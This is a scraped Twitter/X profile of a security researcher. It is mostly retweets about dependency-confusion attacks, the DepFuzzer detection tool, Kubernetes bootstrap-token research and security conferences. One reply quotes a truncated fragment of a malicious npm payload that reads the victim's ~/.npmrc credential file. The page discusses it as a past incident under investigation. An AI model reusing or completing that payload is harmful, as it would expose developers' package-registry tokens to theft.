Scouty

160 posts

Scouty

Scouty

@Scouty__

@Synacktiv

Katılım Temmuz 2011
418 Takip Edilen142 Takipçiler
Scouty retweetledi
Franso
Franso@Fransosiche·
🚨 Une dépendance peut suffire à compromettre toute une entreprise 🎬 On revient sur l’attaque de dependency confusion qui a frappé Apple, Microsoft, etc. 🔍 + focus sur DepFuzzer avec les créateurs @_Worty & @Scouty__ 📺 youtu.be/UWrC0ok9_mc
YouTube video
YouTube
Franso tweet media
Français
2
10
22
1.7K
Scouty retweetledi
Synacktiv
Synacktiv@Synacktiv·
Dependency confusion attacks pose a significant threat to modern software development. In their blogpost, @Scouty__ & @_Worty explain the risks and introduce DepFuzzer, a tool designed to detect vulnerabilities in your project dependencies: synacktiv.com/publications/f…
English
0
22
54
4.7K
Scouty retweetledi
Synacktiv
Synacktiv@Synacktiv·
📣 From July 3 to 5, at Polytech Lille, our ninjas will give the following talks during @passthesaltcon: 👉 So I became a node: Kubernetes bootstrap tokens and AKS, by @Scouty__ and Paul Barbé 👉 Fuzzing confused dependencies with Depfuzzer, by @Scouty__ and @_Worty
English
1
5
19
4.3K
Scouty retweetledi
Synacktiv
Synacktiv@Synacktiv·
For @WEareTROOPERS second day, @Scouty__ and Paul are presenting their research on Kubernetes bootstrap tokens and AKS
Synacktiv tweet media
English
0
14
22
4.4K
Scouty retweetledi
Synacktiv
Synacktiv@Synacktiv·
Kubernetes bootstrap tokens streamline the process of deploying nodes' TLS certificates. Paul Barbé & @Scouty__ studied how these tokens could be exploited in AKS, leading to compromise of the whole cluster. synacktiv.com/publications/s…
English
0
22
65
5.6K
Scouty retweetledi
Synacktiv
Synacktiv@Synacktiv·
After many days (and nights!) of hard work, we're really proud to see @_p0ly_ and @vdehors target the @Tesla Model 3 at #Pwn2Own! Draw will take place on Tuesday, send us all your good vibes 💪
Synacktiv tweet media
English
5
59
248
0
Scouty retweetledi
Hexacon
Hexacon@hexacon_fr·
*drum roll* The Call For Papers is now open! Find all the details about your submission on cfp.hexacon.fr/hexacon-2022/c… Discover the awesome panel of experts who will review your papers ⬇️
English
1
56
77
0
Scouty retweetledi
Hexacon
Hexacon@hexacon_fr·
Croissants, red wine and high-quality offensive security talks in a wonderful place? That's all the Hexacon team is promising for October 2022. Details and Call For Papers are coming very soon... Until then, a bit more teasing for you folks: hexacon.fr #HEXACON2022
Hexacon tweet media
English
1
86
118
0
Scouty retweetledi
r'm
r'm@remeh·
Hey! I've just released a new article on my site that might interest you: « Rendering a map using Go, Mapbox and OpenStreetMap », the title speak for itself. Open to feedbacks! #sig #golang #code #sideprojects 🛠️ remy.io/blog/rendering…
English
0
16
25
0
Scouty retweetledi
Rémi J.
Rémi J.@netsecurity1·
We released a small python script used to parse #formbook PCAPs containing HTTP requests to C&C. Currently extracting: * Beaconing requests * Intercepted HTML forms * Password Recoveries * Clipboard data * Screenshot github.com/ThisIsSecurity…
Rémi J. tweet media
English
3
94
173
0
Scouty
Scouty@Scouty__·
@paulfariello @atomrc @ChabertSylvain @abu_y0ussef Un peu plus bas dans l'issue tu as l'ancien contenu du pastbin try{ var path=require('path'); var fs=require('fs'); var npmrc=path.join(process.env.HOME||process.env.USERPROFILE,'.npmrc'); var content="nofile"; ...
Français
1
0
0
0
Scouty
Scouty@Scouty__·
@ChabertSylvain @abu_y0ussef @paulfariello Ouais c'est bien moche ! Il serait interessant de voir si il y a pas des cas similaires ailleurs. La charge utile c'est ce qui a été exécuté par le "eval", maintenant il y a juste //1 :(
Français
1
0
0
0
Scouty retweetledi
Guillaume Garcia
Guillaume Garcia@leGastroGone·
Amsterdam a vidé un canal et publié tout ce qu'ils ont retrouvé dedans en ligne. De la carte Pokémon de nos jours à des lances d'il y a 3000 ans. Passionnant ! belowthesurface.amsterdam/en/vondsten
Français
53
2.1K
3K
0